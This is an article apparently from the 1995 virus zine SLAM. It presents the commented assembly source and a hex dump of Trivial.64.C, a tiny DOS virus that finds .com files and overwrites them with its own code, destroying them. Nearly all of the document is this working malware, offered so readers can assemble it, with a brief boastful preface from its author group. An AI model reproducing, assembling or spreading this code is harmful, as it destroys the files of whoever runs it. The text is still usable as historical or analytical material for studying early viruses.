Copy Link
Add to Bookmark
Report
SLAM2.020: Trivial.64.C Disassembly by Gothmog/[DHA]
[Trivial.64.C] (c) 1995 Wraith/DHA
Disassembled by Gothmog/[DHA]
Seems I had deleted the source code for this virus, thinking nothing of it, until I noticed that F-Protect v2.26 and Dr. Solomon's FindVirus v7.69 have started detecting it as a unique virus. Well, friend Wraith, seems you have your fifteen minutes (seconds, probably, with this virus) of fame...
In any case, I hauled out Sourcer, disassembled the .com file, and threw in a few comments, for posterity's sake. Even the lamest of the lame should be able to understand this code, if not, shoot yourself. For those of you that are without a `working' assembler (Borland's Turbo Assembler v4.00 or v5.00 should work fine), a hex dump follows at the conclusion of the source.
.model tiny
.code
org 100h
virus_start:
mov ah, 4Eh ; ah = 4Eh, find first file
mov dx, offset file_mask ; points to *.com
int 21h ; do it!
find_file:
jc exit_virus ; exit if no files found
mov ax, 3D01h ; open file for writing
mov dx, 09Eh ; location of filename in psp
int 21h ; do it!
xchg bx, ax ; put filehandle in bx
mov ah, 40h ; write file from handle bx
; number of bytes to write
mov cx, virus_end - virus_start
mov dx, offset virus_start ; start writing from cs:100h
int 21h ; write the bitch!
mov ah, 3Eh ; ah = 3Eh, close file
int 21h ; do it!
mov ah, 4Fh ; ah = 4Fh, find next file
int 21h ; do it!
jmp find_file
exit_virus:
int 20h ; we're outta here...
virus_name db '[TRiV]', 00h
virus_author db 'Wraith/DHA', 00h
file_mask db '*.com', 00h
virus_end equ $
end virus_start
; And finally, the hex dump:
;
; 0100 B4 4E BA 3A 01 CD 21 72 1D B8 01 3D BA 9E 00 CD .N.:..!r...=....
; 0110 21 93 B4 40 B9 40 00 BA 00 01 CD 21 B4 3E CD 21 !..@.@.....!.>.!
; 0120 B4 4F CD 21 EB E1 CD 20 5B 54 52 69 56 5D 00 57 .O.!... [TRiV].W
; 0130 72 61 69 74 68 2F 44 48 41 00 2A 2E 63 6F 6D 00 raith/DHA.*.com.
;
; ============================================================[ code ends ]==